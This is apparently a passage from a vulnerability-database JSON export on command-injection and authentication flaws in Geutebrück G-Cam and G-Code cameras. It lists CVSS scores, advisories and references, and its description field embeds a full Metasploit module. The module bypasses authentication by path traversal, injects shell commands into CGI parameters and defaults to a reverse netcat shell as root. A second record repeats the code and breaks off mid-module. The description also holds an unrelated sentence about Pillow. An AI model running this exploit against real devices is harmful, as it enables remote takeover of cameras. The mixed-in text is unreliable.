            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "PARTIAL",
                "baseScore": 7.5,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "CVE-2021-33543",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "HIGH",
                "trust": 1.0,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
                "version": "2.0"
              },
              {
                "acInsufInfo": null,
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "VULMON",
                "availabilityImpact": "NONE",
                "baseScore": 5.0,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "CVE-2021-33543",
                "impactScore": 2.9,
                "integrityImpact": "NONE",
                "obtainAllPrivilege": null,
                "obtainOtherPrivilege": null,
                "obtainUserPrivilege": null,
                "severity": "MEDIUM",
                "trust": 0.1,
                "userInteractionRequired": null,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 9.8,
                "baseSeverity": "CRITICAL",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 3.9,
                "id": "CVE-2021-33543",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 2.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "OTHER",
                "availabilityImpact": "High",
                "baseScore": 9.8,
                "baseSeverity": "Critical",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "JVNDB-2021-002023",
                "impactScore": null,
                "integrityImpact": "High",
                "privilegesRequired": "None",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2021-33543",
                "trust": 1.0,
                "value": "CRITICAL"
              },
              {
                "author": "info@cert.vde.com",
                "id": "CVE-2021-33543",
                "trust": 1.0,
                "value": "CRITICAL"
              },
              {
                "author": "OTHER",
                "id": "JVNDB-2021-002023",
                "trust": 0.8,
                "value": "Critical"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202104-975",
                "trust": 0.6,
                "value": "MEDIUM"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202107-2095",
                "trust": 0.6,
                "value": "CRITICAL"
              },
              {
                "author": "VULMON",
                "id": "CVE-2021-33543",
                "trust": 0.1,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2021-33543"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2095"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33543"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33543"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Multiple camera devices by UDP Technology, Geutebr\u00fcck and other vendors allow unauthenticated remote access to sensitive files due to default user authentication settings. This can lead to manipulation of the device and denial of service. GEUTEBRUCK Provided by the company G-Cam E2 and G-Code The following multiple vulnerabilities exist in. * Lack of authentication for important features (CWE-306) - CVE-2021-33543 \u2025 * Command injection (CWE-77) - CVE-2021-33544 , CVE-2021-33548 , CVE-2021-33550 , CVE-2021-33551 , CVE-2021-33552 , CVE-2021-33553 , CVE-2021-33554 \u2025 * Stack-based buffer overflow (CWE-121) - CVE-2021-33545 , CVE-2021-33546 , CVE-2021-33547 , CVE-2021-33549The expected impact depends on each vulnerability, but it may be affected as follows. * Confidential information stolen by a remote third party due to improper default user authentication settings - CVE-2021-33543 \u2025 * Arbitrary code executed by command injection by a remote third party - CVE-2021-33544 , CVE-2021-33548 , CVE-2021-33550 , CVE-2021-33551 , CVE-2021-33552 , CVE-2021-33553 , CVE-2021-33554 \u2025 * By a remote third party counter Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33545 \u2025 * By a remote third party name Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33546 \u2025 * By a remote third party profile Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33547 \u2025 * By a remote third party action Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33549. Pillow is a Python-based image processing library. \nThere is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements. ##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule \u003c Msf::Exploit::Remote\n  Rank = ExcellentRanking\n  include Msf::Exploit::Remote::HttpClient\n  include Msf::Exploit::CmdStager\n  prepend Msf::Exploit::Remote::AutoCheck\n\n  def initialize(info = {})\n    super(\n      update_info(\n        info,\n        \u0027Name\u0027 =\u003e \u0027Geutebruck Multiple Remote Command Execution\u0027,\n        \u0027Description\u0027 =\u003e %q{\n          This module bypasses the HTTP basic authentication used to access the /uapi-cgi/ folder\n          and exploits multiple authenticated arbitrary command execution vulnerabilities within\n          the parameters of various pages on Geutebruck G-Cam EEC-2xxx and G-Code EBC-21xx,\n          EFD-22xx, ETHC-22xx, and EWPC-22xx devices running firmware versions \u003c= 1.12.0.27 as\n          well as firmware versions 1.12.13.2 and 1.12.14.5. Successful exploitation results in\n          remote code execution as the root user. \n        },\n\n        \u0027Author\u0027 =\u003e [\n          \u0027Titouan Lazard\u0027, # Of RandoriSec - Discovery\n          \u0027Ibrahim Ayadhi\u0027, # Of RandoriSec - Discovery and Metasploit Module\n          \u0027S\u00e9bastien Charbonnier\u0027 # Of RandoriSec - Metasploit Module\n        ],\n        \u0027License\u0027 =\u003e MSF_LICENSE,\n        \u0027References\u0027 =\u003e [\n          [\u0027CVE\u0027, \u00272021-33543\u0027],\n          [\u0027CVE\u0027, \u00272021-33544\u0027],\n          [\u0027CVE\u0027, \u00272021-33548\u0027],\n          [\u0027CVE\u0027, \u00272021-33550\u0027],\n          [\u0027CVE\u0027, \u00272021-33551\u0027],\n          [\u0027CVE\u0027, \u00272021-33552\u0027],\n          [\u0027CVE\u0027, \u00272021-33553\u0027],\n          [\u0027CVE\u0027, \u00272021-33554\u0027],\n          [ \u0027URL\u0027, \u0027http://geutebruck.com\u0027 ],\n          [ \u0027URL\u0027, \u0027https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/\u0027],\n          [ \u0027URL\u0027, \u0027https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03\u0027]\n        ],\n        \u0027DisclosureDate\u0027 =\u003e \u00272021-07-08\u0027,\n        \u0027Privileged\u0027 =\u003e true,\n        \u0027Platform\u0027 =\u003e [\u0027unix\u0027, \u0027linux\u0027],\n        \u0027Arch\u0027 =\u003e [ARCH_CMD],\n        \u0027Targets\u0027 =\u003e [\n          [\n            \u0027CVE-2021-33544 - certmngr.cgi\u0027, {\n              \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n              \u0027http_vars\u0027 =\u003e {\n                \u0027action\u0027 =\u003e \u0027createselfcert\u0027,\n                \u0027local\u0027 =\u003e Rex::Text.rand_text_alphanumeric(10..16),\n                \u0027country\u0027 =\u003e Rex::Text.rand_text_alphanumeric(2),\n                \u0027state\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027,\n                \u0027organization\u0027 =\u003e Rex::Text.rand_text_alphanumeric(10..16),\n                \u0027organizationunit\u0027 =\u003e Rex::Text.rand_text_alphanumeric(10..16),\n                \u0027commonname\u0027 =\u003e Rex::Text.rand_text_alphanumeric(10..16),\n                \u0027days\u0027 =\u003e Rex::Text.rand_text_numeric(2..4),\n                \u0027type\u0027 =\u003e Rex::Text.rand_text_numeric(2..4)\n              },\n              \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/certmngr.cgi\u0027\n            }\n          ],\n          [\n            \u0027CVE-2021-33548 - factory.cgi\u0027, {\n              \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n              \u0027http_vars\u0027 =\u003e { \u0027preserve\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027 },\n              \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/factory.cgi\u0027\n            }\n          ],\n          [\n            \u0027CVE-2021-33550 - language.cgi\u0027, {\n              \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n              \u0027http_vars\u0027 =\u003e { \u0027date\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027 },\n              \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/language.cgi\u0027\n            }\n          ],\n          [\n            \u0027CVE-2021-33551 - oem.cgi\u0027, {\n              \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n              \u0027http_vars\u0027 =\u003e {\n                \u0027action\u0027 =\u003e \u0027set\u0027,\n                \u0027enable\u0027 =\u003e \u0027yes\u0027,\n                \u0027environment.lang\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027\n              },\n              \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/oem.cgi\u0027\n            }\n          ],\n          [\n            \u0027CVE-2021-33552 - simple_reclistjs.cgi\u0027, {\n              \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n              \u0027http_vars\u0027 =\u003e {\n                \u0027action\u0027 =\u003e \u0027get\u0027,\n                \u0027timekey\u0027 =\u003e Rex::Text.rand_text_numeric(2..4),\n                \u0027date\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027\n              },\n              \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/simple_reclistjs.cgi\u0027\n            }\n          ],\n          [\n            \u0027CVE-2021-33553 - testcmd.cgi\u0027, {\n              \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n              \u0027http_vars\u0027 =\u003e { \u0027command\u0027 =\u003e \u0027PLACEHOLDER_CMD\u0027 },\n              \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/testcmd.cgi\u0027\n            }\n          ],\n          [\n            \u0027CVE-2021-33554 - tmpapp.cgi\u0027, {\n              \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n              \u0027http_vars\u0027 =\u003e { \u0027appfile.filename\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027 },\n              \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/tmpapp.cgi\u0027\n            }\n          ]\n        ],\n        \u0027DefaultTarget\u0027 =\u003e 0,\n        \u0027DefaultOptions\u0027 =\u003e {\n          \u0027PAYLOAD\u0027 =\u003e \u0027cmd/unix/reverse_netcat_gaping\u0027\n        },\n        \u0027Notes\u0027 =\u003e {\n          \u0027Stability\u0027 =\u003e [\u0027CRASH_SAFE\u0027],\n          \u0027Reliability\u0027 =\u003e [\u0027REPEATABLE_SESSION\u0027],\n          \u0027SideEffects\u0027 =\u003e [\u0027ARTIFACTS_ON_DISK\u0027]\n        }\n      )\n    )\n  end\n\n  def firmware\n    res = send_request_cgi(\n      \u0027method\u0027 =\u003e \u0027GET\u0027,\n      \u0027uri\u0027 =\u003e \u0027/brand.xml\u0027\n    )\n    unless res\n      print_error(\u0027Connection failed!\u0027)\n      return false\n    end\n\n    unless res\u0026.body \u0026\u0026 !res.body.empty?\n      print_error(\u0027Empty body in the response!\u0027)\n      return false\n    end\n\n    res_xml = res.get_xml_document\n    if res_xml.at(\u0027//firmware\u0027).nil?\n      print_error(\u0027Target did not respond with a XML document containing the \"firmware\" element!\u0027)\n      return false\n    end\n    raw_text = res_xml.at(\u0027//firmware\u0027).text\n    if raw_text \u0026\u0026 raw_text.match(/\\d\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}/)\n      raw_text.match(/\\d\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}/)[0]\n    else\n      print_error(\u0027Target responded with a XML document containing the \"firmware\" element but its not a valid version string!\u0027)\n      false\n    end\n  end\n\n  def check\n    version = firmware\n    if version == false\n      return CheckCode::Unknown(\u0027Target did not respond with a valid XML response that we could retrieve the version from!\u0027)\n    end\n\n    rex_version = Rex::Version.new(version)\n    vprint_status(\"Found Geutebruck version #{rex_version}\")\n    if rex_version \u003c= Rex::Version.new(\u00271.12.0.27\u0027) || rex_version == Rex::Version.new(\u00271.12.13.2\u0027) || rex_version == Rex::Version.new(\u00271.12.14.5\u0027)\n      return CheckCode::Appears\n    end\n\n    CheckCode::Safe\n  end\n\n  def exploit\n    print_status(\"#{rhost}:#{rport} - Setting up request...\")\n\n    method = target[\u0027http_method\u0027]\n    if method == \u0027GET\u0027\n      http_method_vars = \u0027vars_get\u0027\n    else\n      http_method_vars = \u0027vars_post\u0027\n    end\n\n    http_vars = target[\u0027http_vars\u0027]\n    http_vars.each do |(k, v)|\n      if v.include? \u0027PLACEHOLDER_CMD\u0027\n        http_vars[k][\u0027PLACEHOLDER_CMD\u0027] = payload.encoded\n      end\n    end\n\n    print_status(\"Sending CMD injection request to #{rhost}:#{rport}\")\n    send_request_cgi(\n      {\n        \u0027method\u0027 =\u003e method,\n        \u0027uri\u0027 =\u003e target[\u0027uri\u0027],\n        http_method_vars =\u003e http_vars\n      }\n    )\n    print_status(\u0027Exploit complete, you should get a shell as the root user!\u0027)\n  end\nend\n",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2021-33543"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33543"
          },
          {
            "db": "PACKETSTORM",
            "id": "164036"
          }
        ],
        "trust": 2.34
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2021-33543",
            "trust": 2.7
          },
          {
            "db": "ICS CERT",
            "id": "ICSA-21-208-03",
            "trust": 1.8
          },
          {
            "db": "JVN",
            "id": "JVNVU97817785",
            "trust": 0.8
          },
          {
            "db": "ICS CERT",
            "id": "ICSA-21-208-05",
            "trust": 0.8
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023",
            "trust": 0.8
          },
          {
            "db": "PACKETSTORM",
            "id": "164036",
            "trust": 0.7
          },
          {
            "db": "CS-HELP",
            "id": "SB2021041363",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975",
            "trust": 0.6
          },
          {
            "db": "AUSCERT",
            "id": "ESB-2021.2550",
            "trust": 0.6
          },
          {
            "db": "CS-HELP",
            "id": "SB2021072807",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2095",
            "trust": 0.6
          },
          {
            "db": "OTHER",
            "id": "NONE",
            "trust": 0.1
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33543",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "OTHER",
            "id": null
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33543"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "PACKETSTORM",
            "id": "164036"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2095"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33543"
          }
        ]
      },
      "id": "VAR-202109-0596",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "OTHER",
            "id": null
          }
        ],
        "trust": 0.01
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "camera device"
            ],
            "sub_category": "camera",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "OTHER",
            "id": null
          }
        ]
      },
      "last_update_date": "2025-01-30T21:03:15.617000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "GEUTEBRUCK \u2019 s\u00a0web\u00a0portal\u00a0 (Login required)",
            "trust": 0.8,
            "url": "https://portal.geutebrueck.com/"
          },
          {
            "title": "Geutebr\u00fcck G-Cam E2  and  G-Code Fixes for access control error vulnerabilities",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=157940"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2095"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-306",
            "trust": 1.0
          },
          {
            "problemtype": "Command injection (CWE-77) [ Other ]",
            "trust": 0.8
          },
          {
            "problemtype": " Stack-based buffer overflow (CWE-121) [ Other ]",
            "trust": 0.8
          },
          {
            "problemtype": " Lack of authentication for important features (CWE-306) [ Other ]",
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33543"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.3,
            "url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03"
          },
          {
            "trust": 1.7,
            "url": "https://www.randorisec.fr/fr/udp-technology-ip-camera-vulnerabilities/"
          },
          {
            "trust": 0.8,
            "url": "https://jvn.jp/vu/jvnvu97817785/"
          },
          {
            "trust": 0.8,
            "url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-208-05"
          },
          {
            "trust": 0.7,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33543"
          },
          {
            "trust": 0.6,
            "url": "https://www.cybersecurity-help.cz/vdb/sb2021041363"
          },
          {
            "trust": 0.6,
            "url": "https://www.auscert.org.au/bulletins/esb-2021.2550"
          },
          {
            "trust": 0.6,
            "url": "https://www.cybersecurity-help.cz/vdb/sb2021072807"
          },
          {
            "trust": 0.6,
            "url": "https://packetstormsecurity.com/files/164036/geutebruck-remote-command-execution.html"
          },
          {
            "trust": 0.1,
            "url": "https://ieeexplore.ieee.org/abstract/document/10769424"
          },
          {
            "trust": 0.1,
            "url": "https://cwe.mitre.org/data/definitions/306.html"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33553"
          },
          {
            "trust": 0.1,
            "url": "https://github.com/rapid7/metasploit-framework"
          },
          {
            "trust": 0.1,
            "url": "https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/\u0027],"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33544"
          },
          {
            "trust": 0.1,
            "url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03\u0027]"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33554"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33551"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33548"
          },
          {
            "trust": 0.1,
            "url": "https://metasploit.com/download"
          },
          {
            "trust": 0.1,
            "url": "http://geutebruck.com\u0027"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33550"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33552"
          }
        ],
        "sources": [
          {
            "db": "OTHER",
            "id": null
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33543"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "PACKETSTORM",
            "id": "164036"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2095"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33543"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "OTHER",
            "id": null
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-33543"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "db": "PACKETSTORM",
            "id": "164036"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2095"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-33543"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2021-09-13T00:00:00",
            "db": "VULMON",
            "id": "CVE-2021-33543"
          },
          {
            "date": "2021-07-29T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "date": "2021-09-02T15:36:40",
            "db": "PACKETSTORM",
            "id": "164036"
          },
          {
            "date": "2021-04-13T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "date": "2021-07-27T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202107-2095"
          },
          {
            "date": "2021-09-13T18:15:19.693000",
            "db": "NVD",
            "id": "CVE-2021-33543"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2021-09-27T00:00:00",
            "db": "VULMON",
            "id": "CVE-2021-33543"
          },
          {
            "date": "2021-07-29T08:30:00",
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          },
          {
            "date": "2021-04-14T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          },
          {
            "date": "2022-09-13T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202107-2095"
          },
          {
            "date": "2023-11-07T03:35:51.383000",
            "db": "NVD",
            "id": "CVE-2021-33543"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "PACKETSTORM",
            "id": "164036"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202107-2095"
          }
        ],
        "trust": 0.7
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "GEUTEBRUCK\u00a0 Made \u00a0G-Cam\u00a0E2\u00a0 and \u00a0G-Code\u00a0 Multiple vulnerabilities in",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002023"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "other",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-975"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202109-0850

    Vulnerability from variot - Updated: 2025-01-30 20:43

    Multiple camera devices by UDP Technology, Geutebrück and other vendors are vulnerable to command injection, which may allow an attacker to remotely execute arbitrary code. GEUTEBRUCK Provided by the company G-Cam E2 and G-Code The following multiple vulnerabilities exist in. * Lack of authentication for important features (CWE-306) - CVE-2021-33543 ‥ * Command injection (CWE-77) - CVE-2021-33544 , CVE-2021-33548 , CVE-2021-33550 , CVE-2021-33551 , CVE-2021-33552 , CVE-2021-33553 , CVE-2021-33554 ‥ * Stack-based buffer overflow (CWE-121) - CVE-2021-33545 , CVE-2021-33546 , CVE-2021-33547 , CVE-2021-33549The expected impact depends on each vulnerability, but it may be affected as follows. * Confidential information stolen by a remote third party due to improper default user authentication settings - CVE-2021-33543 ‥ * Arbitrary code executed by command injection by a remote third party - CVE-2021-33544 , CVE-2021-33548 , CVE-2021-33550 , CVE-2021-33551 , CVE-2021-33552 , CVE-2021-33553 , CVE-2021-33554 ‥ * By a remote third party counter Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33545 ‥ * By a remote third party name Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33546 ‥ * By a remote third party profile Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33547 ‥ * By a remote third party action Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33549. Pillow is a Python-based image processing library. There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements. ##

    This module requires Metasploit: https://metasploit.com/download

    Current source: https://github.com/rapid7/metasploit-framework

    class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager prepend Msf::Exploit::Remote::AutoCheck

    def initialize(info = {}) super( update_info( info, 'Name' => 'Geutebruck Multiple Remote Command Execution', 'Description' => %q{ This module bypasses the HTTP basic authentication used to access the /uapi-cgi/ folder and exploits multiple authenticated arbitrary command execution vulnerabilities within the parameters of various pages on Geutebruck G-Cam EEC-2xxx and G-Code EBC-21xx, EFD-22xx, ETHC-22xx, and EWPC-22xx devices running firmware versions <= 1.12.0.27 as well as firmware versions 1.12.13.2 and 1.12.14.5. Successful exploitation results in remote code execution as the root user. },

        'Author' => [
          'Titouan Lazard', # Of RandoriSec - Discovery
          'Ibrahim Ayadhi', # Of RandoriSec - Discovery and Metasploit Module
          'Sébastien Charbonnier' # Of RandoriSec - Metasploit Module
        ],
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2021-33543'],
          ['CVE', '2021-33544'],
          ['CVE', '2021-33548'],
          ['CVE', '2021-33550'],
          ['CVE', '2021-33551'],
          ['CVE', '2021-33552'],
          ['CVE', '2021-33553'],
          ['CVE', '2021-33554'],
          [ 'URL', 'http://geutebruck.com' ],
          [ 'URL', 'https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/'],
          [ 'URL', 'https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03']
        ],
        'DisclosureDate' => '2021-07-08',
        'Privileged' => true,
        'Platform' => ['unix', 'linux'],
        'Arch' => [ARCH_CMD],
        'Targets' => [
          [
            'CVE-2021-33544 - certmngr.cgi', {
              'http_method' => 'GET',
              'http_vars' => {
                'action' => 'createselfcert',
                'local' => Rex::Text.rand_text_alphanumeric(10..16),
                'country' => Rex::Text.rand_text_alphanumeric(2),
                'state' => '$(PLACEHOLDER_CMD)',
                'organization' => Rex::Text.rand_text_alphanumeric(10..16),
                'organizationunit' => Rex::Text.rand_text_alphanumeric(10..16),
                'commonname' => Rex::Text.rand_text_alphanumeric(10..16),
                'days' => Rex::Text.rand_text_numeric(2..4),
                'type' => Rex::Text.rand_text_numeric(2..4)
              },
              'uri' => '/../uapi-cgi/certmngr.cgi'
            }
          ],
          [
            'CVE-2021-33548 - factory.cgi', {
              'http_method' => 'GET',
              'http_vars' => { 'preserve' => '$(PLACEHOLDER_CMD)' },
              'uri' => '/../uapi-cgi/factory.cgi'
            }
          ],
          [
            'CVE-2021-33550 - language.cgi', {
              'http_method' => 'GET',
              'http_vars' => { 'date' => '$(PLACEHOLDER_CMD)' },
